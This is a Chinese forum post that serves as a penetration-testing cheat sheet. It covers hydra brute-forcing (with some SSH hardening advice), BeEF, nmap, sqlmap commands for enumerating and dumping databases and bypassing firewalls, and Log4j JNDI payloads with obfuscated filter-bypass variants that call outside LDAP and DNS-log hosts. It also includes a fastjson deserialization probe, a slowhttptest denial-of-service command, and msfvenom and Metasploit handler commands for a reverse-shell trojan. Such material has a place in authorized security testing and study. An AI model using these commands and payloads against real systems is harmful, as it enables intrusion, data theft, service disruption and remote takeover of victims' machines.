渗透测试工具使用总结

打印 上一主题 下一主题

主题 838|帖子 838|积分 2514

1.hydra[海德拉]:
  1. 密码能否被破解,关键取决于字典是否强大,
  2. 使用:
  3. hydra -L user -P passlist.txt ftp://192.168.0.1
  4. 暴力破解的防御
  5. useradd shell #对于不需要登录的用户,在新建用户的时候可以加入" -s /sbin/nologin"
  6. 密码的复杂性 #字母大小写+数字+特殊字符+20位以上+1个月更换一次
  7. 修改默认的端口 #修改"vim /etc/ssh/sshd_config"文件
  8. 组织登录的用户或组 #不允许用户登录,"PermitRootLogin yes" 添加特定的登录用户 ,"AllowUsers xxx"
  9. 使用sudo #
  10. 设置允许访问的IP #"/etc/hosts.allow" 只允许从堡垒机访问
  11. 使用DenyHosts自动统计,并将其加入到"/etc/hosts.deny"
  12. 禁用密码改用公钥认证登录
  13. 保护XSHELL导出会话文件
复制代码
2.XSS漏洞复现工具(BeFF):
  1. BeFF在Kali中已经自动集成,在运行BeFF之前要先开启Kali apache服务,"service apache start",所有要访问的页面在"/var/www/html"目录下面,也可以新建测试html页面。
  2. 在使用"systemctl start beef-xss.service "来开启BeFF服务,在Kali机的桌面也要启动BeFF的监听服务,默认端口为3000端口,
复制代码
3.NMAP:
  1. nmap -sn [IP]    #主机发现
  2. nmap -sS [端口] [IP]    #端口扫描(TCP端口扫描)
  3. nmap -O [IP]    #系统扫描
  4. namp -sV [IP]    #版本扫描
  5. nmap -Pn[IP]    #跳过主机发现  
  6. nmap -sU[IP]    #用户udp扫描
复制代码
4.SQLMAP:
一般的数据库注入步骤:
  1. 1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点
  2. 2. --dbs 【检测站点包含哪些数据库
  3. 3. --current-db 【获取当前的数据库名
  4. 4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称
  5. 5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段
  6. 6. --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容
复制代码
Cookie注入:
  1. sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2  【cookie注入 后接cookie值
复制代码
POST注入:
  1. (1)目标地址http:// www.xxx.com /login.asp
  2. (2)打开brup代理。
  3. (3)点击表单提交
  4. (4)burp获取拦截信息(post)
  5. (5)右键保存文件(.txt)到指定目录下
  6. (6)运行sqlmap并执行如下命令:
  7.         用例:sqlmap -r okay.txt  -p  username
  8.         -r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)
  9. (7)自动获取表单:--forms自动获取表单
  10.         例如:sqlmap -u www.xx.com/login.asp --forms
  11. (8)指定参数搜索:--data
  12.         例如:sqlmap -u www.xx.com/login.asp --data "username=1"
复制代码
SQLMAP常用的命令:
  1. 1.    --purge      【重新扫描(--purge 删除原先对该目标扫描的记录)
  2. 2.    --tables      【获取表名
  3. 3.     --dbs         【检测站点包含哪些数据库
  4. 4.     --current-db    【获取当前的数据库名
  5. 5.     --current-user  【检测当前用户
  6. 6.    --is-dba   【判断站点的当前用户是否为数据库管理员
  7. 7.    --batch      【默认确认,不询问你是否输入
  8. 8.    --search  【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)
  9. 9.    --threads 10  【线程,sqlmap线程最高设置为10
  10. 10.  --level 3        【sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头
  11.                                 的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5
  12. 11.  --risk 3           【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
  13. 12.     -v   【详细的等级(0-6)
  14.           0:只显示Python的回溯,错误和关键消息。
  15.           1:显示信息和警告消息。
  16.           2:显示调试消息。
  17.           3:有效载荷注入。
  18.           4:显示HTTP请求。
  19.           5:显示HTTP响应头。
  20.           6:显示HTTP响应页面的内容
  21. 13.    --privileges  【查看权限
  22. 14.   --tamper xx.py,cc.py   【防火墙绕过,后接tamper库中的py文件
  23. 15.  --method "POST" --data "page=1&id=2"   【POST方式提交数据
  24. 16.  --threads number  【采用多线程 后接线程数
  25. 17.  --referer  ""  【使用referer欺骗
  26. 18.  --user-agent ""     【自定义user-agent
  27. 19.  --proxy “目标地址″   【使用代理注入
复制代码
Kali系统集成的SQLMAP工具目录:
  1. sqlmap常用路径:
  2. 1. 添加表字段的目录在sqlmap/txt/common-tables.txt
  3. 2. 存放扫描记录的目录在sqlmap/output
复制代码
5.Log4j检测及绕过:
  1. 检测:
  2. ${jndi:ldap://4jvfqe.ceye.io/exp}
  3. 绕过:
  4. 原本POC:
  5. ${jndi:ldap://malicious-ldap-server.com/a}
  6. 绕过的POC:
  7. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}
  8. 可行的POC:
  9. ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}
复制代码
6.接口反序列化测试:
  1. {"@type":"java.net.InetSocketAddress"{
  2. "address":,
  3. "val":"cyl31t.dnslog.cn"}}
复制代码
 7.Kali自集成的web目录扫描工具:
  1. dirb
  2. 使用方法:
  3. dirb [URL]
  4. 它的字典放在:
  5. /usr/share/dirb/wordlist/common.txt
  6. 如果指定文件类型扫描,则使用如下命令:
  7. dirb [URL] -X .txt,.php,.zip
复制代码
 8.slowhttptest使用语句
  1. slowhttptest -c 8000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.xxx.com -p 3
复制代码
 9.MSF生成远控木马命令
  1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[攻击机IP] lport=[攻击机监听端口] -f exe -o demo.exe
复制代码
 下一步开启msf的监听,等待木马上线
  1. use exploit/mutil/handler
  2. set payload windows/x64/meterpreter/reverse_tcp
  3. set lhost [攻击机IP]
  4. set lport [攻击机端口]
  5. run
复制代码
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

祗疼妳一个

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表